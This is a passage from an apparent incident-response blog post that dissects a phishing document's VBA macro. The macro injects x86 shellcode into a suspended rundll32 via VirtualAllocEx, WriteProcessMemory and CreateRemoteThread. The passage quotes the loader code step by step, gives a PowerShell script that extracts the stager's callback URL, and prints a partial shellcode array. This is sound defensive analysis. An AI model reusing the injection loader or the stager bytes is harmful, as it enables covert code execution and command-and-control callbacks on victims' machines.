The If statement picks a 32-bit rundll32.exe. The ProgramW6432 variable only exists on 64-bit Windows, so there sProc becomes windir plus \SysWOW64\rundll32.exe (the 32-bit copy, because the shellcode is x86); on 32-bit Windows it is windir plus \System32\rundll32.exe. The doubled backslashes are a quirk of the template (VBA has no escape sequences), and Windows path normalisation tolerates them.

```vba
If Len(Environ("ProgramW6432")) > 0 Then
sProc = Environ("windir") & "\\SysWOW64\\rundll32.exe"
Else
sProc = Environ("windir") & "\\System32\\rundll32.exe"
End If
```

RunStuff (CreateProcessA) starts that rundll32. The arguments in order: no application name (sNull), the command line sProc, no process and no thread security attributes (ByVal 0&, ByVal 0&), bInheritHandles = 1, dwCreationFlags = 4, which is CREATE_SUSPENDED, no environment block, no current directory, and the STARTUPINFO and PROCESS_INFORMATION structures. The process is created suspended, so rundll32's own code never runs, and pInfo.hProcess is the handle used for everything that follows.

```vba
res = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
```

AllocStuff (VirtualAllocEx) reserves memory inside rundll32: process handle pInfo.hProcess, any address (0), UBound(myArray) bytes, flAllocationType = &H1000 (MEM_COMMIT) and flProtect = &H40 (PAGE_EXECUTE_READWRITE). The two constants are the allocation type and the page protection respectively, and together they yield the RWX region the variable name rwxpage refers to. UBound is one less than the element count, so the request is one byte short; this goes unnoticed because allocations are rounded up to a 4 KiB page.

```vba
rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)
```

The For loop walks myArray and uses WriteStuff (WriteProcessMemory) to copy each element into rundll32 one byte at a time: process handle pInfo.hProcess, destination rwxpage + offset, source variable myByte, length 1, and no bytes-written pointer.

```vba
For offset = LBound(myArray) To UBound(myArray)
myByte = myArray(offset)
res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)
Next offset
```

Finally CreateStuff (CreateRemoteThread) starts a thread in rundll32 whose start address is rwxpage. The shellcode therefore executes inside rundll32, not inside the Office process that ran the macro, which is why Word itself looks clean afterwards.

```vba
res = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
```
Overall, a macro like this is just another kind of shellcode loader, very close to the C++ loader pattern of VirtualAlloc, RtlMoveMemory/CopyMemory and CreateThread. The only difference is that the Ex/Remote variants are used, so the target is a freshly spawned rundll32 rather than the macro's own process.

The idea is always the same: obtain a readable, writable and executable memory region, drop the shellcode into it, create a thread on it, done.
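What can be pulled out of that blob without a debugger, as an added example that is not part of the original post. The signed VBA array is converted back to bytes, printable runs are extracted the way `strings` does, and the port is read out of the stager's `push <port>; push ebx; push eax; push 0xC69F8957; call ebp` sequence, where 0xC69F8957 is the Metasploit block_api hash of `InternetConnectA` and the whole sequence is a fixed feature of the x86 reverse_http stager that Cobalt Strike reuses. `$Sample` is an excerpt of the array in the macro above (the InternetConnectA call, the User-Agent block, the URI and the trailing host string) so the script runs offline; for real work pass the full macro dump via `-VbaSource (Get-Content macro.vba -Raw)`.

```powershell
# Added example (not from the original post): recover C2 indicators from a CS/MSF VBA shellcode array.

function ConvertFrom-VbaByteArray {
    param([Parameter(Mandatory)][string]$VbaSource)
    # The array is written as signed VBA values with `_` line continuations; pull the literal and rebuild the bytes
    if (-not ($VbaSource -match '(?s)Array\((.*?)\)')) { throw 'no Array(...) literal found' }
    $values = ($Matches[1] -replace '[\s_]', '') -split ','
    $bytes  = foreach ($v in $values) { [byte](([int]$v + 256) % 256) }   # -4 -> 0xFC, 85 -> 0x55
    return ,[byte[]]$bytes
}

function Get-PrintableStrings {
    param([Parameter(Mandatory)][byte[]]$Bytes, [int]$MinLength = 4)
    # Same idea as `strings`: keep 0x20-0x7E runs and cut on anything else
    # (no ASCII decode, which would turn every high byte into a printable '?')
    $sb = New-Object System.Text.StringBuilder
    foreach ($b in $Bytes) {
        if ($b -ge 0x20 -and $b -le 0x7E) { [void]$sb.Append([char]$b) } else { [void]$sb.Append("`n") }
    }
    $sb.ToString() -split "`n" | Where-Object { $_.Length -ge $MinLength }
}

function Get-StagerPort {
    param([Parameter(Mandatory)][byte[]]$Bytes)
    # x86 reverse_http stager: 68 <port imm32> 53 50 68 57 89 9F C6 == push port; push ebx; push eax; push InternetConnectA-hash
    $hash = [byte[]](0x57, 0x89, 0x9F, 0xC6)
    for ($i = 0; $i -le $Bytes.Length - 12; $i++) {
        if ($Bytes[$i] -eq 0x68 -and $Bytes[$i + 5] -eq 0x53 -and $Bytes[$i + 6] -eq 0x50 -and $Bytes[$i + 7] -eq 0x68 -and
            $Bytes[$i + 8] -eq $hash[0] -and $Bytes[$i + 9] -eq $hash[1] -and $Bytes[$i + 10] -eq $hash[2] -and $Bytes[$i + 11] -eq $hash[3]) {
            return [BitConverter]::ToUInt32($Bytes, $i + 1)
        }
    }
    return $null
}

# Excerpt of the macro's array (InternetConnectA call, User-Agent, URI, trailing host string); pass the full dump for real work
$Sample = @'
myArray = Array(104, 64, 31, 0, 0, 83, 80, 104, 87, -119, -97, -58, -1, -43, _
-78, 0, 85, 115, 101, 114, 45, 65, 103, 101, 110, 116, 58, 32, 77, 111, 122, 105, 108, 108, 97, 47, 53, 46, 48, 32, 40, 99, 111, 109, 112, 97, 116, 105, 98, 108, 101, 59, 32, 77, _
83, 73, 69, 32, 57, 46, 48, 59, 32, 87, 105, 110, 100, 111, 119, 115, 32, 78, 84, 32, 54, 46, 49, 59, 32, 87, 79, 87, 54, 52, 59, 32, 84, 114, 105, 100, 101, 110, 116, 47, _
53, 46, 48, 59, 32, 66, 79, 73, 69, 57, 59, 69, 78, 85, 83, 83, 69, 77, 41, 13, 10, 0, _
-24, -117, -1, -1, -1, 47, 57, 69, 117, 105, 0, _
49, 48, 46, 50, 48, 46, 50, 52, 46, 49, 56, 0, 18, 52, 86, 120)
'@

$sc = ConvertFrom-VbaByteArray -VbaSource $Sample
"{0} bytes of shellcode" -f $sc.Length
Get-PrintableStrings -Bytes $sc
"stager port: {0}" -f (Get-StagerPort -Bytes $sc)
```

Against the excerpt the strings pass returns the User-Agent line, the URI `/9Eui` and the host `10.20.24.18`, and the port check returns 8000, so the stager's callback is `http://10.20.24.18:8000/9Eui`. The same three functions give the same answer on the full array. The four-character `SPhW` that also comes back is opcode bytes that happen to be printable, the usual noise of a `strings` pass; the `-MinLength` parameter is there to raise the bar when the output gets busy.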

As soon as the document is opened, Task Manager shows the freshly started rundll32.

The macro does nothing else: no additional DLL injection, no scheduled task, nothing persistent. It acts purely as a simple shellcode loader whose job is to call back to the attacker's CS server. That concludes the sample analysis.

The routine next steps would be to delete the phishing document, delete the hidden account that was created, check for any other backdoors, and close the case.

But I still felt there were too many things left unexplained that puzzled me:

1. After the CS callback, did the attacker really not use CS to establish persistence?

2. Is the intrusion trail really as simple as a phishing e-mail plus a macro calling back to CS?

Why was the recipient already attack$? Did the attacker get in by some other route, create the attack$ account, then install a mail client themselves to receive the phishing e-mail and trigger the CS callback?

3. If a hidden account was created, why are there no 4720 and 4722 events? And if CS cleared the logs, why was the event log service not left stopped?

Stay tuned for Windows Incident Response Part 2 (assuming this noob manages to find and analyse any more traces).


© 2016 - 2024 掌控者 All Rights Reserved.